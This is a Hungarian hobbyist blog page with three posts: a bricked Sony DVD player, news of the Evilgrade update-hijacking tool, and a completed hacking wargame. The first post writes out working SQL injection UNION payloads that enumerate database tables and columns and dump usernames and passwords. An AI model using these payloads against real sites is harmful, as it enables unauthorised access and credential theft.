« Előző oldal
Következő oldal »

Minden ami „hack”

Firmware upgrade

2009. január 4. 18:07 Hozzászólások (1)

Sony a seggem. Az asztali DVD lejátszóm ugyebár tud DivX-et lejátszani, de nem mennek vele a feliratok. Gondoltam jól van, nézzük van-e firmware frissítés a Sonynál. Hát volt is, pont a feliratokhoz. Betűről betűre végigtoltam, és a végén most nem indul el az aparát. Mehetek szervízbe vele. Remek.

Ezen viszont kurvára felbasztam az agyamat… tehát.

táblákok nevei:

42 UNION SELECT 1,table_schema,3,4,5,6,7,table_name,9,10,11,12 FROM
          information_schema.TABLES

oszlopok nevei:

-- CONCAT('0x',HEX('Felhasznalok')) = 0x46656C6861737A6E616C6F6B

42 UNION SELECT 1,2,3,4,5,6,7,COLUMN_NAME,9,10,11,12 FROM
          information_schema.COLUMNS WHERE
                table_name = 0x46656C6861737A6E616C6F6B

felhasználók nevei :))

42 UNION SELECT 1,jelszo,3,4,5,6,7,loginNev,9,10,11,12 FROM
          Felhasznalok

Ez azért még megy. :)

Így legyen ötösöm a lottón

2008. július 29. 22:51 Hozzászólások (0) ,

András: Nem igaz, hogy mostanában mennyit frissít a Vista!

Encsé: Hát épp most tölti le a nem hivatalos frissítéseket ezzel a DNS cache mérgezés mókával.

András: Ugyan már, ez digitálisan alá van írva!

Encsé: aha persze…

Ez volt kb. múlt csütörtökön. Ma a buhera blogon olvasom, hogy:

Az Infobyte Security Research csapata közzé tett egy Evilgrade nevű eszköt, amely a legutóbbi DNS cache poisoning hiba kihasználásával, illetve egyéb man-in-the-middle módszerek segítségével lehetővé teszi, hogy elterjedt alkalmazások automatikus frissítési szolgáltatásán keresztül futtassunk saját kódokat a szolgáltatást igénybe vevő számítógépeken.

Hát így. Na ebben kellett volna fogadni a havi fizetésemre.

Ördöglakat

2008. február 9. 17:43 Hozzászólások (19)

Még mindig vírust keresek… Közben gyorsan végigtoltam az ordoglakat nevű magyar hacker játékot. Íme a hekkerdimplomám: http://ordoglakat.info/diploma.aspx?id=1508 :)

Hát nem csodálatos?

Maga a játék viszonylag egyszerű. A triviális dolgok mellett van benne két sql injectionös pálya, egy nslookupos, meg egy netcates is. Ez utóbbi eszköz nekem új volt, de máris örök barátságot kötöttünk. (Szerencsére van a cygwinben is.)

Az egész nem túl nehéz, ráadásul komplett hint system is segíti a próbálkozót. Egy esti mozi helyett pont jó kikapcsolódás. Az okosok meg úgyis mind gekkót játszanak. :)

Ennyire tökös gyerek a zencsé:

Pálya Szint Játékosok Sikerült Átlagos idő Encsé ideje
1 JScript 2001 fő 1674 fő 233 perc 1 perc
2 Hidden Text 1662 fő 1467 fő 429 perc 2 perc
3 Stegano 1476 fő 1124 fő 807 perc 38876 perc
4 Reminder 1124 fő 725 fő 1489 perc 18 perc
5 DirList 725 fő 614 fő 1024 perc 16 perc
6 Decrypt 614 fő 571 fő 732 perc 15 perc
7 Deface 570 fő 518 fő 968 perc 15 perc
8 Info gather 527 fő 468 fő 762 perc 2 perc
9 SQL Inject 464 fő 412 fő 460 perc 7 perc
10 Brute Force 412 fő 373 fő 1016 perc 49 perc
11 Backdoor 372 fő 245 fő 3917 perc 22 perc
12 Diploma 246 fő 206 fő 1861 perc 15 perc

A Steganonál már pár hete elment a kedvem az egésztől, de ma újult erővel ismét belevágtam! A brute forcenál meg csináltam egy gyönyörű Ajaxos codát, ami teljesen magától oldotta meg a feladatot. Na az volt 49 perc…

« Előző oldal
Következő oldal »